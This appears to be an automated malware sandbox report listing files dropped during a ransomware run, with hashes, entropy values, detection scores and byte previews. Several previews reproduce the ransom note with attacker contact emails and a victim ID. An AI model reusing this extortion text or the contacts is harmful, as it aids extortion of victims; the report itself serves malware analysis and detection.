                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):902856
                                                                                                    Entropy (8bit):6.618307623021751
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:I2wMm7l55+OeO+OeNhBBhhBBaELPA081o9baXpL3K+HDFgZUid4X9dCU5+Kazw4t:I2wMm7lfCIL3K+gY9dfcw4h3DX9X1
                                                                                                    MD5:9049FABA5517305C44BD5F28398FB6B9
                                                                                                    SHA1:036C6B32F3E7D7D689C9B4D482091EEBCC669BFA
                                                                                                    SHA-256:D2100FFE58EB50C05D97A3DA738CCD1F0BE9672C057C26A10140AF80595B78C3
                                                                                                    SHA-512:65A33506F970675775468F80B94A3F8BB2D3672E6FB08FC9F2E5107020095CA6D4BCA927C59B72488E2EF4208A64A56CED7511EA14C0445CD50EA3FF9B827F6A
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                                                                    • Antivirus: Virustotal, Detection: 67%, Browse
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: NOTIFICATION_OF_DEPENDANTS.vbs, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{h.............x......x..r...x......o......o......o......o......x......x..........q....o.......o...............o......Rich....................PE..L.....\g.....................$......<.............@.......................................@..................................K...........q...............(...`......0b..p....................c.......b..@...............0............................text............................... ..`.rdata.............................@..@.data...l....`...^...F..............@....rsrc....q.......r..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.256547976919888
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:C/TmVzC7B1nXzmX5VezC0sH85IuEhzjESND3U6VxSn:aTmFC7B1n4uljSNbpSn
                                                                                                    MD5:D3CDA4442FDFB51AFF63466EEAF70FE6
                                                                                                    SHA1:1DD0071F403D9755125C0136FA4BB66FCD1DCCCD
                                                                                                    SHA-256:96FB70037A6A5B05EB5A435751FC07BF8137CA514ADD72ACD9ECD09BEBFFE498
                                                                                                    SHA-512:E4D7F0C1C22910F5BB0BFADC37BF15866F45D489046099140055B2EE161345351DA90AFB7D592ED2B9E30A57BCEFAB98E93AC259ABB65393B608E238E889E7B5
                                                                                                    Malicious:false
                                                                                                    Preview:.....WG..`...............#i".|;5?n.&U..4b.B...b.8....+....@.7S...)T...BT~.4......*.......$..Mp.z........Fy.(^9/.I....;2....@Z..-.9..-).I.P...#k2....~.8!._k...1[.H..W38/...._a....ji..\=.v~.'.E.u8A.;L3p.OyX.t.p..R.J...7..r..E..C........2..|(i.h1.{......X..".y.l.....'P6[`0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):288
                                                                                                    Entropy (8bit):7.2187907255166825
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:E7IvsiDv6NN5wDUTmXaOFeble13stEN4OrggvYxw5AmLHaaFJSn:E0vsZoeBe13saxPvHt6amn
                                                                                                    MD5:C8EE01F99D6BE60F5A5997DD9D1DF17B
                                                                                                    SHA1:3DFFE27CDB53063A7CE2F734C4C6958B76E46879
                                                                                                    SHA-256:ACA8E14BEB23DB37B5A6BEBB306A6D535B58BA938FCF5972B3A44E90C4CEC372
                                                                                                    SHA-512:026AB1527B23F1217948CEDFD776CB5400F05E6429C1D975A743E7D8DEA1E18FA21B0F01A5003F80416046C3D7FA57ACCF2BD587E621292C93C9DC0B186EBE42
                                                                                                    Malicious:false
                                                                                                    Preview:.......{.X..h.>>].>>.V.O..7.{....K"..T..m....7.#..@....X.C(,6.}.......3.O4....(.......At..n....w.........~i.+..C@..P.O..m:....*3LpTk.....}w.D}.....&......qR....}l....O.hiN..,....I...x.O.3...cX....../.3...=.s.'2U...P.6..........9L..v.%Aq.u.|.FG.mQ..h~....o.~..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):288
                                                                                                    Entropy (8bit):7.2187907255166825
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:E7IvsiDv6NN5wDUTmXaOFeble13stEN4OrggvYxw5AmLHaaFJSn:E0vsZoeBe13saxPvHt6amn
                                                                                                    MD5:C8EE01F99D6BE60F5A5997DD9D1DF17B
                                                                                                    SHA1:3DFFE27CDB53063A7CE2F734C4C6958B76E46879
                                                                                                    SHA-256:ACA8E14BEB23DB37B5A6BEBB306A6D535B58BA938FCF5972B3A44E90C4CEC372
                                                                                                    SHA-512:026AB1527B23F1217948CEDFD776CB5400F05E6429C1D975A743E7D8DEA1E18FA21B0F01A5003F80416046C3D7FA57ACCF2BD587E621292C93C9DC0B186EBE42
                                                                                                    Malicious:false
                                                                                                    Preview:.......{.X..h.>>].>>.V.O..7.{....K"..T..m....7.#..@....X.C(,6.}.......3.O4....(.......At..n....w.........~i.+..C@..P.O..m:....*3LpTk.....}w.D}.....&......qR....}l....O.hiN..,....I...x.O.3...cX....../.3...=.s.'2U...P.6..........9L..v.%Aq.u.|.FG.mQ..h~....o.~..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):290
                                                                                                    Entropy (8bit):7.249471827958152
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:EyKk2hxH7PTiUr4RSPSmVCJhkcdSKTvKZ+L3KsL5Sn:E4CbPTVUoABj0a3KsL5Sn
                                                                                                    MD5:3464DF7384C2C64E9C74501C2EEB4761
                                                                                                    SHA1:496059928634ED6C278CD945F53C14E726A69D7B
                                                                                                    SHA-256:F187BC5635F89561C7DEA745FFFA7590B1E33F8059E777BA050EDF493E0D44C7
                                                                                                    SHA-512:7ECB791F1A2BE7DFDB8A856BFC2E1EC403CDF3F6B0FF03C6513A843265371E1D2C9455E166662A91358099EBBA33AA526878F2D25859E8F621AE89BAF5748313
                                                                                                    Malicious:false
                                                                                                    Preview:..\Ti..!..!8...<<>>].>>.j3...tf$..;8.N....1D..1.;.h%3n.w7..c..G..B...`............K..t...{.!p.4.k..Sz.......@....W...:?7.w@.{x.......3U...g..,,E...Qy[....x.e..'...!..?...4...8.g.....TSb...@...r.:U.........<..2...#Yp.^e......"..._...1n.Q>..?ej...W...OE./....G.....w...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):290
                                                                                                    Entropy (8bit):7.249471827958152
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:EyKk2hxH7PTiUr4RSPSmVCJhkcdSKTvKZ+L3KsL5Sn:E4CbPTVUoABj0a3KsL5Sn
                                                                                                    MD5:3464DF7384C2C64E9C74501C2EEB4761
                                                                                                    SHA1:496059928634ED6C278CD945F53C14E726A69D7B
                                                                                                    SHA-256:F187BC5635F89561C7DEA745FFFA7590B1E33F8059E777BA050EDF493E0D44C7
                                                                                                    SHA-512:7ECB791F1A2BE7DFDB8A856BFC2E1EC403CDF3F6B0FF03C6513A843265371E1D2C9455E166662A91358099EBBA33AA526878F2D25859E8F621AE89BAF5748313
                                                                                                    Malicious:false
                                                                                                    Preview:..\Ti..!..!8...<<>>].>>.j3...tf$..;8.N....1D..1.;.h%3n.w7..c..G..B...`............K..t...{.!p.4.k..Sz.......@....W...:?7.w@.{x.......3U...g..,,E...Qy[....x.e..'...!..?...4...8.g.....TSb...@...r.:U.........<..2...#Yp.^e......"..._...1n.Q>..?ej...W...OE./....G.....w...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65716
                                                                                                    Entropy (8bit):6.570280349874584
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Aa+uq8pQdn1nwyJhnxsxPwkZ6x5RX1X2QdQZiXEWZBMZ/dYS8VLm+kig+GPG6R:Aa/q86d1wSnxslEkZ4ZeZutbzfc
                                                                                                    MD5:B76983DA18AE4F2A21218392034793BE
                                                                                                    SHA1:D59AF858F31F690EBC583EEA453D53841B2EA2E1
                                                                                                    SHA-256:31F7C93802DE9B17937F5FE9E8B4950BA4E15028FA74BD91AA49363F58DC88DD
                                                                                                    SHA-512:5845D4F078B6C79DE41B8C5A7793932E6988E81C49D8C168BA2D78B5B77C90FF8741000BA62B3F8EE36F6F941ADCC23D99D741DA10FCF9577BB5BCB87C941B23
                                                                                                    Malicious:false
                                                                                                    Preview:..=P.2....:..N...v.....@$...^..)..-=..4.zM.|..h.b..}....oO?.4..jE..yJ....U...Q.i..93.... .....4A...z0.G..Eh.fs..(P..{ %...&X8<.`....W.o|q .H....%v|.k..O(...C$.......6........8 wm....|...s..a.....I"...0N.........0..%...F\%-S..HjE*......t...1.).F}2.I.y.V6.N..zh.>6......e....4.\.^...PD.j.....@.Wm......oP.,HyK.R.:...o.J.Nd@.D...........*~...../>..6...x...S.vXqh.........|e(.K.D. .2....;.'...R..2. ..N.5p..~....kI.-...0"\..+/..#.A.(Ay.....d.%%u.....a.:...[.NPO[...9......Hb.....T./Ab.O@.6.......z....u.\.-..V..D......`..^O...l..b.?.".%U.Ou...:Z..r......m.*.'.$..m8a..;..<g..Cj.~.......T.j.......!.lr..fLs...R...a.eE.W..o...@......*Vf..vc..P.?....2.o......../.h.2yt.a...6.dl.z.....d.P.{...a....%#.*.Tl..d.{c...z.c..m;VO...h\.M..5..)'W...P.9.b..y7.......Hd^....f..zi.n+.M.J{..G.\-{K.}...sL.C7..=.:...........t....A....wy..m....G...v...6O..X/...uz.....f.9..`.u.1.u.J.v/..3..9......K..K:d?..........K..4.{3b8.....CVz...[..c....z.La.b..v.#W..`.t.{=(../...5.... ..\.eP.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65716
                                                                                                    Entropy (8bit):6.570280349874584
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Aa+uq8pQdn1nwyJhnxsxPwkZ6x5RX1X2QdQZiXEWZBMZ/dYS8VLm+kig+GPG6R:Aa/q86d1wSnxslEkZ4ZeZutbzfc
                                                                                                    MD5:B76983DA18AE4F2A21218392034793BE
                                                                                                    SHA1:D59AF858F31F690EBC583EEA453D53841B2EA2E1
                                                                                                    SHA-256:31F7C93802DE9B17937F5FE9E8B4950BA4E15028FA74BD91AA49363F58DC88DD
                                                                                                    SHA-512:5845D4F078B6C79DE41B8C5A7793932E6988E81C49D8C168BA2D78B5B77C90FF8741000BA62B3F8EE36F6F941ADCC23D99D741DA10FCF9577BB5BCB87C941B23
                                                                                                    Malicious:false
                                                                                                    Preview:..=P.2....:..N...v.....@$...^..)..-=..4.zM.|..h.b..}....oO?.4..jE..yJ....U...Q.i..93.... .....4A...z0.G..Eh.fs..(P..{ %...&X8<.`....W.o|q .H....%v|.k..O(...C$.......6........8 wm....|...s..a.....I"...0N.........0..%...F\%-S..HjE*......t...1.).F}2.I.y.V6.N..zh.>6......e....4.\.^...PD.j.....@.Wm......oP.,HyK.R.:...o.J.Nd@.D...........*~...../>..6...x...S.vXqh.........|e(.K.D. .2....;.'...R..2. ..N.5p..~....kI.-...0"\..+/..#.A.(Ay.....d.%%u.....a.:...[.NPO[...9......Hb.....T./Ab.O@.6.......z....u.\.-..V..D......`..^O...l..b.?.".%U.Ou...:Z..r......m.*.'.$..m8a..;..<g..Cj.~.......T.j.......!.lr..fLs...R...a.eE.W..o...@......*Vf..vc..P.?....2.o......../.h.2yt.a...6.dl.z.....d.P.{...a....%#.*.Tl..d.{c...z.c..m;VO...h\.M..5..)'W...P.9.b..y7.......Hd^....f..zi.n+.M.J{..G.\-{K.}...sL.C7..=.:...........t....A....wy..m....G...v...6O..X/...uz.....f.9..`.u.1.u.J.v/..3..9......K..K:d?..........K..4.{3b8.....CVz...[..c....z.La.b..v.#W..`.t.{=(../...5.... ..\.eP.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1003
                                                                                                    Entropy (8bit):7.775181647520087
                                                                                                    Encrypted:false
